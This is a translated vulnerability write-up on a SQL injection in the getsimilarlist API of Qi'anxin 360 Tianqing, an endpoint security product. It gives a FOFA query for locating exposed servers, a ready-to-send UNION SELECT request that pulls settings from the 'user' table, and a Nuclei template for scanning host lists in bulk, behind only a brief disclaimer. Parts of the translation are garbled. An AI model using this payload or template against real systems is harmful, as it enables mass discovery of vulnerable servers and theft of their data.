Qi'anxin 360 Tianqing's getsimilarlist has a SQL injection vulnerability
Disclaimer: Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article will be the responsibility of the user himself. All consequences incurred Adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.
1. Product description
Qianxin Tianqing is a terminal security management system (referred to as "Tianqing") product of Qianxin Group dedicated to integrated terminal security solutions. Through the "systematic defense, digital operation" approach, we help government and enterprise customers accurately identify, protect and supervise terminals, and ensure that these terminals can access data and business in a trustworthy, secure and compliant manner at any time [1]. [2] Tianqing is built on Qi’anxin’s new “Trantuo” terminal security platform, which integrates high-performance virus scanning, vulnerability protection, active defense engines, and deeply integrates innovative technologies such as threat intelligence, big data analysis, and security visualization. Through the system Compliance and reinforcement, threat prevention and detection, operation and maintenance control and audit, terminal data leakage prevention, unified management and operation and other functions help government and enterprise customers build sustained and effective terminal security capabilities.
2. Vulnerability description
Qi'anxin 360 Tianqing's getsimilarlist has a SQL injection vulnerability.
3. Vulnerability Recurrence
fofa: banner="QiAnXin web server" || banner="360 web server" || body="appid":"skylar6" || body="/task/index/detail?id={item.id}" | | body="Expired or unauthorized, please contact 4008-136-360 to purchase"
1. Manual reproduction
LITTLE
GET /api/client/getsimilarlist?status%5B0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281%5D=1&status%5B0%5D=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
BURP screenshot
2. Automated recurrence
①nulei scan
yaml
id: qianxin-360-tianqing-getsimilarlist-sqli-rce
info:
name: qianxin-360-tianqing-getsimilarlist-sqli-rce
author: m0be1
severity: high
tags: qianxin,sqli,iot
description: 奇安信360天擎getsimilarlist存在SQL注入漏洞
metadata:
fofa-query: banner="QiAnXin web server" || banner="360 web server" || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权,购买请联系4008-136-360"
verified: true
max-request: 1
http:
- raw:
- |
GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "list"
- "total"
- "reason\":\"success"
part: body
condition: and
- type: word
part: header
words:
- "application/json"
nuclei.exe -t qianxin-360-tianqing-getsimilarlist-sqli.yaml -l subs.txt -stats
②Xiaolong POC detection
Xiaolong's POC test passes Hala Shao
Tool download address
Xiaolong POC portal: Xiaolong POC tool